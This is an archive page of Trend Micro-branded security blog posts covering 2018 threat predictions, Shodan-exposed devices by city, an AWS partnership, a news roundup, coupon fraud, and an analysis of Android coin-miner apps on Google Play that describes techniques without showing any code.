Category Archives: Trend Micro

  • 0

Security Predictions for 2018 Paradigm Shifts

Category : Trend Micro

Skills and resources — these are the two elements that make up an attacker’s arsenal. An attacker, however, cannot set out to break security or even perform sophisticated attacks without finding weak points in a system first. Massive malware attacks, email-borne heists, hacked devices, and disrupted services — all of these require a vulnerability in the network, whether in the form of technology or people, in order to be pulled off.

Increased connectivity and interaction over insecure networks are a given. Unfortunately, poor implementation of technologies adds to the likelihood of threats being realized. Having protection where and when it’s needed will become the backbone of security in this ever-shifting threat landscape.

In 2018, digital extortion will be at the core of most cybercriminals’ business model and will propel them into other schemes that will get their hands on potentially hefty payouts. Vulnerabilities in IoT devices will expand the attack surface as devices get further woven into the fabric of smart environments everywhere. Business Email Compromise scams will ensnare more organizations to fork over their money. The age of fake news and cyberpropaganda will persist with old-style cybercriminal techniques. Machine learning and blockchain applications will pose both promises and pitfalls. Companies will face the challenge of keeping up with the directives of the General Data Protection Regulation (GDPR) in time for its enforcement. Not only will enterprises be riddled with vulnerabilities, but loopholes in internal processes will also be abused for production sabotage.

These are the threats that will make inroads in the 2018 landscape. As such, they will serve as further proof that the days of threats being addressed with traditional security solutions are behind us. As environments become increasingly interconnected and complex, threats are redefining how we should look at security.

Trend Micro has looked into the current and emerging threats, as well as the security approaches tailored for the landscape. Read on to find out how to make informed decisions with regard to the security focus areas that will figure prominently in 2018.


For 2017, we predicted that cybercriminals would diversify ransomware into other attack methods. True enough, the year unfolded with incidents such as WannaCry and Petya’s rapidly propagated network attacks, Locky and FakeGlobe’s widespread spam run, and Bad Rabbit’s watering hole attacks against Eastern European countries.

We do not expect ransomware to go away anytime soon. On the contrary, it can only be anticipated to make further rounds in 2018, even as other types of digital extortion become more prevalent. Cybercriminals have been resorting to using compelling data as a weapon for coercing victims into paying up. With ransomware-as-a-service (RaaS) still being offered in underground forums, along with bitcoin as a secure method to collect ransom, cybercriminals are being all the more drawn to the business model.

Ransomware maturity as a catalyst for digital extortion campaigns

If the evolution of cybercriminal tactics over the years is any indication, cybercriminals are now going straight for the money instead of tricking users into giving up their credentials. The early online threats were heavy on infostealers and malware that hijacked banking transactions to steal private information. Then, the breed of threats went out to disguise themselves as anti-malware solutions (FAKEAV), whereby users were duped into downloading the software and paying up to regain access to the victimized computers. Emulating this behavior of FAKEAV, ransomware took the stage from then on.

The current success of ransomware campaigns — especially their extortion element — will prompt cybercriminals looking to make generous profits out of targeting populations that will yield the most return possible. Attackers will continue to rely on phishing campaigns where emails with ransomware payload are delivered en masse to ensure a percentage of affected users. They will also go for the bigger buck by targeting a single organization, possibly in an Industrial Internet of Things (IIoT) environment, for a ransomware attack that will disrupt the operationsand affect the production line. We already saw this in the fallout from the massive WannaCry and Petya outbreaks, and it won’t be long until it becomes the intended impact of the threat.

Extortion will also come into play when GDPR gets imposed. Cybercriminals could target private data covered by the regulation and ask companies to pay an extortion fee rather than risk punitive fines of up to 4 percent of their annual turnover. Companies will have ransom prices associated with them that cybercriminals can determine by taking publicly available financial details and working out the respective maximum GDPR fines the companies could face. This will drive an increase in breach attempts and ransom demands. Moreover, we expect GDPR to be used as a social engineering tactic in the same way that copyright violations and police warnings were used in past FAKEAV and ransomware campaigns.

Users and enterprises can stay resilient against these digital extortion attempts by employing effective web and email gateway solutions as a first line of defense. Solutions with high-fidelity machine learning, behavior monitoring, and vulnerability shielding prevent threats from getting through to the target. These capabilities are especially beneficial in the case of ransomware variants that are seen moving toward fileless delivery, in which there are no malicious payloads or binaries for traditional solutions to detect.


The massive Mirai and Persirai distributed denial-of-service (DDoS) attacks that hijacked IoT devices, such as digital video recorders (DVRs), IP cameras, and routers, have already elevated the conversation of how vulnerable and disruptive these connected devices can be. Recently, the IoT botnet Reaper, which is based on the Mirai code, has been found to catch on as a means to compromise a web of devices, even those from different device makers.

We predict that aside from performing DDoS attacks, cybercriminals will turn to IoT devices for creating proxies to obfuscate their location and web traffic, considering that law enforcement usually refers to IP addresses and logs for criminal investigation and post-infection forensics. Amassing a large network of anonymized devices (running on default credentials no less and having virtually no logs) could serve as jumping-off points for cybercriminals to surreptitiously facilitate their activities within the compromised network.

We should also anticipate more IoT vulnerabilities in the market as many, if not most, manufacturers are going to market with devices that are not secure by design. This risk will be compounded by the fact that patching IoT devices may not be as simple as patching PCs. It can take one insecure device that has not been issued a fix or updated to the latest version to become an entry point to the central network. The KRACK attack proved that even the wireless connection itself could add to the security woes. This vulnerability affects most, if not all, devices that connect to the WPA2 protocol, which then raises questions about the security of 5G technology, which is slated to sweep connected environments.

Devices that will be targeted for disruptions and cybercrime

With hundreds of thousands of drones entering the U.S. airspace alone, the prospect of overseeing the aerial vehicles can be daunting. We expect that reports of drone-related accidents or collisions are only the start of it, as hackers have already been found to access computers, grab sensitive information, and hijack deliveries. Likewise, pervasive home devices such as wireless speakers and voice assistants can enable hackers to determine house locations and attempt break-ins.

We also expect cases of biohacking, via wearables and medical devices, to materialize in 2018. Biometric activity trackers such as heart rate monitors and fitness bands can be intercepted to gather information about the users. Even life-sustaining pacemakers have been found with vulnerabilities that can be exploited for potentially fatal attacks.What adopters and regulators should recognize now is that not all IoT devices have built-in security, let alone hardened security. The devices are open to compromise unless manufacturers perform regular risk assessments and security audits. Users are also responsible for setting up their devices for security, which can be as simple as changing default passwords and regularly installing firmware updates.


According to the Federal Bureau of Investigation (FBI), BEC scams have been reported in over a hundred countries and have a marked increase of 2,370 percent in identified exposed losses between January 2015 and December 2016. This isn’t surprising since BEC scams are to cybercriminals what burglary is to “offline” criminals. BEC scams are quick, require very little scouting, and can yield big gains depending on the target, as evidenced by the US$5 billion recorded losses.

We predict that BEC incidents will only multiply in 2018, leading to more than US$9 billion* in global losses. This hike in the projected reported losses will be brought on partly by a growing awareness around BEC and the tactics used, which will result in better identification and increased reporting of the scams. Mainly, it will be rooted in how BEC scams bank on phishing approaches that time and again have proved to be effective. We will continue to see BEC scams that involve company executives being impersonated to wire sums of money. We’ve been observing it in the increase of BEC attack attempts involving CEO fraud. It’s also interesting to note that instead of planting keyloggers, BEC scammers are turning to phishing PDFs and sites, which are cheaper than keyloggers with crypting services. With phishing, they can still compromise accounts, and at lower costs at that.

The simplicity of knowing a target organization’s hierarchy (which may even be publicly available on social media and corporate websites) and the brevity of the emails make a case for an efficient ploy to funnel money. There is, however, another financially driven enterprise threat expected to still be wielded by cybercriminals who are willing to do the long con: Business Process Compromise (BPC). With BPC, cybercriminals learn the inner workings of the organization, particularly in the financial department, with the aim of modifying internal processes (possibly via corporate supply chain vulnerabilities) and hitting the mother lode. However, given that it requires long-term planning and more work, BPC is less likely to make headlines in 2018, unlike the much simpler BEC.

BEC can be deflected if employee training is in place, as it is reliant on social engineering. Companies should implement strict protocols on internal processes, especially when making any kind of transaction. Small- and medium-sized businesses, as well as enterprises, should employ multiple verifications, whereby another established communication channel, such as a phone call, is at one’s disposal for double-checking. Web and gateway solutions that provide accurate detection of social engineering tactics and forged behaviors may also be able to block BEC threats.

*US$9 billion is based on computing the monthly average of reported losses from June to December 2016 and multiplying it by 12. This only assumes that there is a flat growth for reported BEC incidents and victims.


The fake news triangle consists of: motivations the propaganda is built on, social networks that serve as a platform for the message, and tools and services that are used to deliver the message. In 2018, we expect cyberpropaganda to spread via familiar techniques: those that were once used to spread spam via email and the web.

Do-it-yourself (DIY) kits in the form of software, for instance, can perform automated social media spamming. Even black hat search engine optimization (SEO) has been adapted to social media optimization (SMO), with a user base of hundreds of thousands able to provide traffic and numbers to different platforms. From spear-phishing emails sent to foreign ministries to the blatant use of documents to discredit authorities, dubious content can spread freely and spark forceful opinions or even real protests.Fabricated information, additionally, can put businesses in a bad light and even hurt their performance and reputation. Researchers are even looking into audio and video manipulation tools that allow realistic-looking footage to further blur the line between authentic and fake. Manipulated political campaigns will continue to mount smear tactics and deliberately shift public perception, as allowed by the tools and services readily available in underground marketplaces.It is likely that the upcoming Swedish general election will not be exempt from attempts to influence the voting outcome through fake news. The interest will also be hot on the heels of the U.S. midterm elections, as social media can be wielded to amplify divisive messages, as in the alleged meddling in the previous U.S. presidential election and the “troll farm” behind a Twitter influencer.Each time fake news gets posted and reposted, a reader encountering the same content grows familiar with it and takes it as truth. Having the eye to distinguish fake news from not will be tough, as propagandists use old techniques that have proved effective and reliable.Fake news and cyberpropaganda will press on because there has been no dependable way to detect or block manipulated content. Social media sites, most notably Google and Facebook, have already pledged a crackdown on bogus stories propagating across feeds and groups, but it has had little impact so far. That being the case, the final screening will still be dependent on the users themselves. But as long as users are not educated in flagging false news, such content will continue to permeate online and be consumed by unsuspecting and undiscerning readers.


Knowing what is unknown. That’s one of the key promises of machine learning, the process by which computers are trained but not deliberately programmed. For a relatively nascent technology, machine learning shows great potential. Already, however, it’s become apparent that machine learning may not be the be-all and end-all of data analysis and insights identification. Machine learning lets computers learn by being fed loads of data. This means that machine learning can only be as good and accurate as the context it gets from its sources.

Going into the future, machine learning will be a key component of security solutions. While it uncovers a lot of potential for more accurate and targeted decision-making, it poses an important question: Can machine learning be outwitted by malware?

We’ve found that the CERBER ransomware uses a loader that certain machine learning solutions aren’t able to detect because of how the malware is packaged to not look malicious. This is especially problematic for software that employs pre-execution machine learning (which analyzes files without any execution or emulation), as in the case of the UIWIX ransomware (a WannaCry copycat), where there was no file for pre-execution machine learning to detect and block.

Machine learning may be a powerful tool, but it is not foolproof. While researchers are already looking into the possibilities of machine learning in monitoring traffic and identifying possible zero-day exploits, it is not far-fetched to conjecture that cybercriminals will use the same capability to get ahead of finding the zero-days themselves. It is also possible to deceive machine learning engines, as shown in the slight manipulation of road signs that were recognized differently by autonomous cars. Researchers have already demonstrated how machine learning models have blind spots that adversaries can probe for exploitation.

While machine learning definitely helps improve protection, we believe that it should not completely take over security mechanisms. It should be considered an additional security layer incorporated into an in-depth defense strategy, and not a silver bullet. A multilayered defense with end-to-end protection, from the gateway to the endpoint, will be able to fight both known and unknown security threats.

Another emerging technology that is poised to reshape businesses and that we see being abused is the blockchain. Blockchain technology has generated a lot of buzz in the context of digital cryptocurrencies and as a form of no-fail security. Adoption of the decentralized ledger is projected to be widespread in five to 10 years. Currently, however, many initiatives are already being built on blockchain, ranging from technology and finance industry startups and giants to entire governments – all with the goal of revolutionizing business models.

Blockchain works by having a required consensus among the participants, which makes unauthorized changes or deliberate tampering with the blockchain difficult to do. The more transfers there are, the more the series becomes complex and obfuscated. This obfuscation, likewise, can be seen as an opportunity by cybercriminals looking into enhancing their attack vectors. They have already managed to target the blockchain in the Ethereum DAO hack, which led to over US$50 million worth of digital currency lost.

Like most promising technologies that were thought secure at one point, machine learning and blockchain warrant close attention.


The European Union (EU) will finally be rolling out GDPR in May 2018, with an expected extensive impact on data handling of companies that engage with EU citizens’ data – even if the said companies are outside Europe. In our research, we found that the majority of C-level executives (in 57 percent of businesses) shun the responsibility of complying with GDPR, with some unaware of what constitutes personally identifiable information (PII) and even unbothered by potential monetary penalties.

Laggards will fully heed the brunt of GDPR only when the retributions are imposed by the regulators. Data privacy watchdogs can interfere with business operations by altogether banning companies from processing certain data. There is also the possibility that lawsuits, both from the authorities and from the citizens themselves, will come into the picture.

The American credit reporting agency Equifax, for instance, would have faced a staggering fine, as some U.K. consumers were reportedly affected too, if the breach had happened after the GDPR implementation had gone into effect and it hadn’t come forward with the incident sooner than it chose to. A considerable penalty would have also been imposed on the international ride-hailing company Uber, which announced a data breach over a year after the fact. Noncompliance with breach notification will prompt regulators to issue fines of up to €20 million, or up to 4 percent of the company’s global annual turnover of the preceding financial year, whichever is greater.

Companies waking up to the GDPR enforcement, therefore, will find the importance of having a dedicated data protection officer (DPO) who can spearhead data processing and monitoring. DPOs are particularly needed in enterprises and industries that handle sensitive data. Companies will be required to review their data security strategy, including classifying the nature of data and distinguishing EU data from data associated with the rest of the world.

Other regions will have to catch up with their data regulations by having a similar framework of wide-ranging scope and tougher penalties for compliance failure. The U.S. Food and Drug Administration (FDA) has already recognized several European drug regulatory authorities to improve its inspections. Australia is gearing up to enact its own data breach notification laws based on the Privacy Amendment (Notifiable Data Breaches) Act 2017, while U.K.’s Data Protection Bill is getting updated to match EU’s laws after Brexit. Meanwhile, the EU-U.S. Privacy Shield deal will have to prove how binding it is in spite of concernsexpressed by the EU.


In today’s environment, where the Industry 4.0 makes cyber-physical systems and production processes increasingly interconnected and software-defined, risks can stem from several areas within. The notion of having a digital twin, a virtual replica or simulation of the real-world production or process, is enabling enterprises to address performance issues that may arise in real physical assets. However, we believe that while it’s poised to transform operations, the production network can be infiltrated by malicious actors aiming to manipulate the system and cause operational disruptions and damages. By manipulating the digital twin itself, these actors can make production processes look legitimate when they have, in fact, been modified.

In addition, production data that is directly (or indirectly) handed over via manufacturing execution systems (MES) to SAP or other enterprise resource planning (ERP) systems is also in danger of being compromised. If a manipulated piece of data or wrong command is sent to an ERP system, machines will be liable to sabotage processes by carrying out erroneous decisions, such as delivery of inaccurate numbers of supplies, unintended money transfers, and even system overloads.

Enterprise systems will not be the only ones targeted; in 2018, we expect to continue to see security flaws in Adobe and Microsoft platforms. What’s going to be particularly interesting, however, is the renewed focus on browser-based and server-side vulnerabilities.

For years, the vulnerabilities of well-known browser plug-ins like Adobe Flash Player, Oracle’s Java, and Microsoft Silverlight have been targeted. We predict that in 2018, however, weaknesses in JavaScript engines will beset the modern browsers themselves. From Google Chrome’s V8 crashing issues to Microsoft Edge’s Chakra being open sourceJavaScript-based browser vulnerabilities will make more appearances in 2018 given the wide use of the script on the web.

Attackers will also take a renewed focus on using server-side vulnerabilities to deliver malicious payloads. We predict that the use of Server Message Block (SMB) and Samba exploits that deliver ransomware will be more pronounced in 2018. SMB vulnerabilities, in particular, can be exploited without any direct interaction with the user. In fact, an SMB vulnerability was used in the EternalBlue exploit that crippled many networks running on Windows during the WannaCry and Petya ransomware attacks, and in the more recent Bad Rabbit attacks that exploited EternalRomance. The open-source Samba on Linux, similarly, is capable of exploiting vulnerabilities in the SMB protocol.

Attacks against production processes through SAP and ERP mean that enterprises will need to take the security of related applications as priority. Access to the applications will need to be managed and monitored to avoid any unauthorized access.

Users and enterprises are advised to routinely check for software updates and apply patches once they are available. However, as administrators can stumble over immediate deployment of updates, we recommend integrating vulnerability shielding into systems so that platforms are protected against unpatched and zero-day vulnerabilities. Network solutions should also secure connected devices from potential intrusions through virtual patching and proactive monitoring of web traffic.

Tackling Security in 2018
Given the broad range of threats the landscape currently bears and will expect to face in 2018 – from vulnerabilities and ransomware to spam and targeted attacks – what enterprises and users alike can best do is to minimize the risk of compromise at all layers.

Better visibility and multilayered security defense for enterprises

To combat today’s expansive threats and be fortified against those yet to come, organizations should employ security solutions that allow visibility across all networks and that can provide real-time detection and protection against vulnerabilities and attacks. Any potential intrusions and compromise of assets will be avoided with a dynamic security strategy that employs cross-generational techniques appropriate for varying threats. These security technologies include:

  • Real-time scanning. Active and automatic scans allow highly efficient malware detection and improved machine performance.
  • Web and file reputation. Malware detection and prevention through web reputation, anti-spam techniques, and application control protect users from ransomware attacks and exploits.
  • Behavioral analysis. Advanced malware and techniques that evade traditional defenses are proactively detected and blocked.
  • High-fidelity machine learning. Human inputs augmented with threat intelligence data allow rapid detections and accurate defenses against known and unknown threats.
  • Endpoint security. Security that employs sandboxing, breach detection, and endpoint sensor capabilities detect suspicious activities and prevent attacks and lateral movement within the network.

Best practices and sustained protection for end-users

Having different devices and applications to access information is becoming second nature in today’s increasingly connected world. Regardless of device, application, or network, users will be able to fill the security gaps with proper configurations:

Change default passwords. Use unique and complex passwords for smart devices, especially for routers, to significantly reduce the possibility of attackers hacking into the devices.

Set up devices for security. Modify devices’ default settings to keep privacy in check and implement encryption to prevent unauthorized monitoring and use of data.

Apply timely patches. Update the firmware to its latest version (or enable the auto-update feature if available) to avoid unpatched vulnerabilities.

Deflect social engineering tactics. Always be mindful of emails received and sites visited as these can be used for spam, phishing, malware, and targeted attacks.

Enterprises and users are better positioned if protections in place are able to cover the entire threat life cycle with multiple security layers. From the email and web gateway to the endpoint, having a connected threat defense ensures maximum protection against the constantly evolving threats of 2018 and beyond.


  • 0

Cities Exposed in Shodan

Category : Trend Micro

Western European, UK, French, German, and US cities exposed. Are your connected devices searchable on the internet? Find out what you are risking.

Shodan Reveals Exposed Cyber Assets

Using Shodan data, the Trend Micro Forward-looking Threat Research (FTR) team assessed which types of cyber assets found in cities across the globe are the most exposed. When a cyber asset like a webcam or a printer is searchable, threat actors can look for means to compromise the device or find out whether the device itself or its software version is known to be vulnerable. Affected parties can use the results of our research to justify investments such as the implementation of the necessary security measures that will better protect their data and assets from future compromise.

What is Shodan?

Shodan is an online search engine that catalogs cyber assets or internet-connected devices. Shodan finds and lists devices and systems such as webcams, baby monitors, medical equipment, industrial control system (ICS) devices, home appliances, and databases, among others. Shodan collates and makes searchable both device metadata and banner information that internet-connected devices and systems are freely sharing over the public internet—and with anyone who queries them.

What are exposed cyber assets?

We define “exposed cyber assets” as internet-connected devices and systems that are discoverable on Shodan or similar search engines, and can be accessed via the public internet. When a certain device or protocol is exposed, it does not necessarily mean that the cyber asset is automatically vulnerable or compromised.

However, since an exposed device is searchable and visible to the public, attackers can take advantage of the available information on Shodan in order to mount an attack. For instance, an attacker may check if the associated software of a device is vulnerable, or if the admin console’s password is easy to crack.

Cities Exposed Worldwide

We have looked at different developed countries in the world to see whether exposure levels differ across countries and in what ways. We have been able to analyze the exposed cyber assets in the United States, Western Europe as a region, the United Kingdom, France, and Germany.

Western European Cities Exposed

We presented data on exposed cyber assets in the top 10 most populous cities in Western Europe—London, Berlin, Athens, Madrid, Rome, Paris, Stockholm, Oslo, Amsterdam and Lisbon. London and Berlin had more than 2.5 million exposed systems while Amsterdam and Madrid had numbers in the region of a million.

US Cities Exposed

We presented data on exposed cyber assets in the top 10 largest U.S. cities by population—New York City, Los Angeles, Chicago, Houston, Philadelphia, Phoenix, San Antonio, San Diego, Dallas, and San Jose. Los Angeles, Houston, Chicago, and Dallas each had more than 2 million exposed cyber assets that make them vulnerable to exploitation and compromise.

For each research project, we answered the following questions:

  • Which capital or city has the most number of exposed cyber assets?
  • What are the most common connections, operating systems, and exposed and vulnerable products/software and device types in this country/region?

Then for each capital or city, we drilled down to analyze:

  • Different exposed device types such as webcams, network-attached storage (NAS) devices, routers, printers, Voice over IP (VoIP) phones, and media recording devices
  • Different exposed web services like email databases and other database types like MySQL, PostgreSQL, CouchDB, and MongoDB
  • Different exposed services like NTP, UPnP, SNMP, SSH, RDP, Telnet, and FTP

Lastly, we also went into detail about what home office owners and enterprise network defenders can do to safeguard their networks from attacks that different threat actors can launch.



  • 0

Trend Micro Enhances Cloud Security Through Integration with AWS Security Services

Category : Trend Micro

Trend Micro Incorporated, a global leader in cybersecurity solutions, today announced that they are one of the first companies for Enterprise Contracts for AWS Marketplace, a provider of rules for the newly launched Amazon Web Services (AWS) Web Application Firewall (WAF) Managed Rules Partner Program, and a new integration with Amazon GuardDuty.

Enterprise Contracts for AWS Marketplace defines a set of standardized contract terms across multiple software vendors to simplify and speed procurement.

“AWS Marketplace is simplifying the enterprise software procurement experience to accelerate customer innovation,” said Dave McCann, Vice President of AWS Marketplace and Catalog Services, Amazon Web Services, Inc. “Trend Micro is a valued AWS Marketplace seller that embraces customer feedback to drive their innovation in product and business models. We are delighted to have them as one of the first companies for Enterprise Contract for AWS Marketplace.”

Through cooperation with AWS, Trend Micro expects to deliver application protection rules as part of the new AWS WAF Managed Rules Partner Program. This brings proven vulnerability research and protection to better secure applications and data deployed on the cloud.

Cloud workload automation is necessary to make data management scalable across enterprise ecosystems. Trend Micro’s integration with Amazon GuardDuty allows users to take advantage of the security findings from Amazon GuardDuty to make even smarter decisions with their Amazon Elastic Compute Cloud (Amazon EC2) and Amazon EC2 Container Service (Amazon ECS) workloads. This automated workflow increases visibility and reduces the operational overhead, saving builders time.

“We are proud to provide an extra layer of protection to the innovative applications that AWS builders are deploying on the cloud,” said Kevin Simzer, EVP at Trend Micro. “Our collaboration with AWS allows us to deliver scalable security that removes friction from procurement, devops lifecycle and day-to-day operations.”

Since 2012, Trend Micro has been dedicated to safeguarding customers’ cloud environments across a wide variety of industry verticals, including healthcare organizations, governments and financial services. Trend Micro is also an Advanced tier Technology Partner in the AWS Partner Network (APN), an AWS Security Competency Partner and an AWS Marketplace seller.

For those attending AWS re:Invent 2017, please visit the Trend Micro booth (#1812) during the show to learn more or find out more online at


  • 0

The Week in Security Week

Category : Trend Micro

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days.

Below you’ll find a quick recap of topics followed by links to news articles and/or our blog posts providing additional insight. Be sure to check back each Friday for highlights of the goings-on each week!

Coupon Fraud Could be Costing Your Business Millions

There is a dark side to couponing: fraud. While seemingly a mild form of fraud, wide-spread coupon fraud can add up. PennLive put realistic estimates of coupon crime costs between $300 – 600 million per year in the U.S. While losses will vary per organization, this is still no small price to pay for any business.

Microsoft Just Fixed a 17 Year Old Security Flaw in Office

Since 2000, there’s been a vulnerable component in the equation editor, which allows you to insert complex mathematical expressions into your documents. It’s a feature most users never touch, but a well-executed attack could allow a hacker to launch malicious code on a vulnerable machine.

New Banking Malware Variant Wants to Scoop up Your Email and Social Media Accounts

A sophisticated form of malware based on the notorious Zeus trojan and originally designed to steal banking credentials has returned with new espionage capabilities which allow it to monitor and modify Facebook and Twitter posts, as well as the ability to eavesdrop on emails.

New EMOTET Hijacks Windows API

Trend Micro recently discovered that EMOTET has a new iteration with a few changes in its usual behavior and new routines that allow it to elude sandbox and malware analysis. Based on its findings, EMOTET’s dropper changed from using RunPE to exploiting CreateTimerQueueTimer.

Cybercriminals Are Gaining Access to iCloud Accounts Through Phishing Emails

As Americans begin to worry more about cybercrime than the conventional kind, researchers warn users to remain cautious of both, as stolen iPhones are so valuable in criminal circles that they can go for as much as $2,100 in some countries.

Amazon Key Flaw Could Let Rogue Deliverymen Disable Your Camera

Security researchers have demonstrated that with a simple program run from any computer in Wi-Fi range, that the internet enabled camera called Cloud Cam, can be not only disabled, but frozen. A viewer watching its live or recorded stream sees only a closed door, even as their actual door is opened.

IcedID Banking Trojan Targets US Financial Institutions

A new banking trojan called IcedID, spotted by researchers last September, has been wreaking havoc among financial institutions across the US, UK and Canada, including banks, payment card providers, mobile services providers, as well as e-commerce sites.

Trend Micro’s Capture the Flag Competition Provides Young Pros Real-World Experience

Young cybersecurity professionals need to overcome the gap between what is learned in a classroom and the practical experience required to protect real, critical business data. Trend Micro’s annual Capture the Flag (CTF) competition works to bridge this gap.

Budget for Cybersecurity in 2018

As Q4 begins in earnest, now is the time to start making considerations for next year’s budgets. This is especially true for the company’s IT and cyber security budgets – a difficult decision with so many robust technologies and new threats emerging. Check out top considerations for next year’s budget.

Pursue the Right to be Left Alone

Are you working for a US-based firm that holds personal information about European Union or Swiss citizens? If so, you should do three things. 1) Opt in to the Privacy Shield. 2) Put a Data Protection Officer in place. 3) Ensure your IAM solution is comprehensive and effective.

Hacker Hijacks North Korean Radio Station and Plays ‘The Final Countdown’

A North Korean radio station was reportedly hijacked by an unknown hacker to play the 1980’s hit song “The Final Countdown”. The short-wave radio station, 6400kHz is allegedly run from the North Korean city Kanggye and is known to be used by Pyongyang to transmit secret codes.


Author: Jon Clay

  • 0

Coupon fraud could be costing your business millions

Category : Trend Micro

Customers are always looking for good deals with their purchases and a coupon could be the defining factor for a buyer completing his or her transaction. In fact, a 2015 survey by found that paper coupons were used by 63 percent of respondents. This is followed by discounts for online and mobile purchases. Distributed coupons are valued at billions of dollars every year and companies continue to use these techniques to attract consumers for their business. However, there is a darker side to couponing: fraud. The real-life costs of this crime go beyond the deals consumers get and could be costing your business millions.

coupon fraudWhile seemingly a mild form of fraud, wide-spread coupon fraud can add up.


What is coupon fraud?

Coupon fraud comes in a variety of flavors. Normally, coupon transactions are simply data changing hands between the consumer, coupon providers and an agent that sorts and audits the coupons. Because there are so many layers, only one needs to be vulnerable to affect the whole supply chain. The Balance noted that shoppers often participate in coupon fraud by making multiple copies of the coupon, using the discount for products that extend beyond those listed in the terms, stealing newspaper inserts and buying or selling coupons. When consumers don’t stick to the rules for printing out coupons or abiding by the usage agreements, this is considered illegal activity and leaves businesses covering the cost.

Coupon fraud is costing businesses millions.Coupon fraud is costing businesses millions.

Just how damaging is it?

When a business accepts a counterfeit coupon or scans and authorizes a deal for products that aren’t listed on the coupon, it might not be caught at first. It can even seem like a small occurrence compared to all of the other transactions that the business might see throughout the day. However, PennLive put realistic estimates of coupon crime costs between $300 million and $600 million per year in the U.S. While losses will vary per organization, this is still no small price to pay for any business.

With such a lucrative market, cyber criminals are taking advantage of coupon fraud for their own payday. In fact, Trend Micro stated that coupon fraud’s scalability results in business process compromise, which undermines business operations components and significantly impacts the bottom line. Fraudsters can generate purportedly valid coupon codes and distribute them to unknowing consumers. New customer promos are also sold in bulk in the underground, which allow buyers to take advantage of perks given upon account registration. These occurrences mount up, earning criminals money while costing your business.

Be aware of distribution channels

How coupons are sent to customers can be an important factor in coupon fraud cases. Social media in particular is being used more for delivering great deals and acting as a marketplace for potential transactions. Cyber criminals have identified this tactic and are devising their own legitimate looking coupons or discounts to scam social media users. According to Consumer Affairs, a recent online coupon scam promised deals on popular consumer products. The catch was that the buyer would need to provide their credit card information or personal identifying data in order to get the coupon. Fraudsters could then sell this data on the underground market and use it for identity theft.

If your business decides to market through social media, it’s important to show that your page is verified. This could help consumers better identify real deals while still attracting revenue opportunities through the social channels. As cyber criminals continue to create legitimate looking coupon codes and scams, it will be integral for organizations to direct customers to actual discount pages.

Spotting and stopping fake coupons

For businesses and consumers alike, coupon fraud is a major problem. Businesses increase the prices on products to make up for the losses, which then impacts consumers that seek to legitimately use coupons. This cyclical occurrence will continue as long as fake coupons are distributed. There are a few signs that organizations should be wary of:

  • Coupons without bar codes.
  • Discounts where a purchase isn’t required to redeem it.
  • Deals that are more than the actual price of the item.
  • Coupons that don’t have conditions of usage on them.

Cashiers themselves must be trained on how to use coupons properly and catch potential fraud cases.

Smart coupon creation can make a big difference in identifying legitimate ones over counterfeits. Trend Micro suggested putting safeguards in place like limiting the reuse, distribution and time limit for coupon codes. Businesses can also personalize coupons and use anti-counterfeit techniques like complex data codes, watermarks, code authentication and microprinting to deter scammers from duplicating codes and deals. Leaders must also work with distributors, stakeholders and law enforcement to establish stronger fraud resistance and risk management policies for coupon programs. All the while, organizations need to maintain the privacy, security and integrity of their infrastructure that manages critical processes.

Organizations must be prudent in their coupon strategies this holiday season. Organizations must be prudent in their coupon strategies this holiday season.


Don’t be duped this holiday

As the holiday season approaches, more businesses will start coming out with sales and deals on their products and services. However, it’s also the perfect time for cyber criminals and coupon counterfeiters to make a quick payday off of unsuspecting victims. Consumers must take care to check over their coupons for terms of agreement and remain wary of deals that ask for personal information, particularly those distributed through social media sites.

Organizations must take action now to determine the best distribution strategy for their sales marketing strategy while also designing their coupons to limit fraud opportunities. Here, a time limit mark could be a great solution, along with design choices to reflect the holiday season. This makes it much harder for criminals to replicate and helps consumers identify which deals are legitimate. Retailers must be prudent to ensure buyers play by the rules to get freebies and discounts.

Safeguards will limit coupon fraud and prevent abusers from repeatedly cashing in on coupons this holiday season.



  • 0

Data Center Attack: The Game

Category : Trend Micro

Game Overview

In Data Center Attack: The Game, put yourself in the shoes of a CISO at a hospital to see if you can go back in time to prevent a data center attack from holding critical patient data hostage.

You’ll be prompted to make decisions that will impact your security posture. Wrong choices could result in ransomware hijacking your patient data and putting lives at risk. Right choices will show you what happens with DevOps and IT work together, will allow doctors to see patient data, and the hospital will run as expected.

See if you have the knowledge it takes to stop a data center attack, and if not, learn what defenses you need to prevent one.

Play the game now.

  • 0

Coin Miner Mobile Malware Returns, Hits Google Play

Category : Trend Micro

The efficacy of mobile devices to actually produce cryptocurrency in any meaningful amount is still doubtful. However, the effects on users of affected devices are clear: increased device wear and tear, reduced battery life, comparably slower performance.

Recently, we found that apps with malicious cryptocurrency mining capabilities on Google Play. These apps used dynamic JavaScript loading and native code injection to avoid detection. We detect these apps as ANDROIDOS_JSMINER and ANDROIDOS_CPUMINER.

This is not the first time we’ve found these types of apps on app stores. Several years ago, we found malicious apps on the Google Play store detected as ANDROIDOS_KAGECOIN, a malware family with hidden cryptocurrency mining capabilities.

ANDROIDOS_JSMINER: Mining via Coinhive

We’ve previously seen tech support scams and compromised websites used to deliver the Coinhive JavaScript cryptocurrency miner to users. However, we’re now seeing apps used for this purpose, which we detect as ANDROIDOS_JSMINER. Wtwo apps we found; one supposedly helps users pray the rosary, while the other provides discounts of various kinds.

Figures 1 and 2. JSMINER Malware on Google Play

Both of these samples do the same thing once they are started: they will load the JavaScript library code from Coinhive and start mining with the attacker’s own site key:

Figure 3. Code to start mining when the app starts

This JavaScript code runs within the app’s webview, but this is not visible to the user because the webview is set to run in invisible mode by default.

Figure 4. Webview is set to invisible mode

When the malicious JavaScript code is running, the CPU usage will be exceptionally high.

ANDROIDOS_CPUMINER: Trojanized versions of legitimate apps

Another family of malicious apps takes legitimate versions of apps and adds mining libraries, which are then repackaged and distributed. We detect these as ANDROIDOS_CPUMINER.

One version of this malware is in Google Play and disguised as a wallpaper application:

Figure 5. Mining malware on Google Play store

The mining code appears to be a modified version of the legitimate cpuminer library. The legitimate version is only up to 2.5.0, whereas this malicious version uses 2.5.1. The code is added to normal applications, as seen below:

Figure 6. Code added to normal apps by CPUMINER

Please note that the above code layout was taken from a sample that is not found on Google Play, but belongs to the same family.

Figure 7. Malware with modified code

The mining code fetches a configuration file from the cybercriminal’s own server (which uses a dynamic DNS service) that provides information on its mining pool via the Stratum mining protocol.

Figure 8. Cryptocurrency mining profits

The figure above shows that the attacker is mining various cryptocurrencies, with varying amounts of currencies mined. It also shows that the value of the coins mined over an unknown period amounts to just over 170 US dollars; total profits aren’t known.

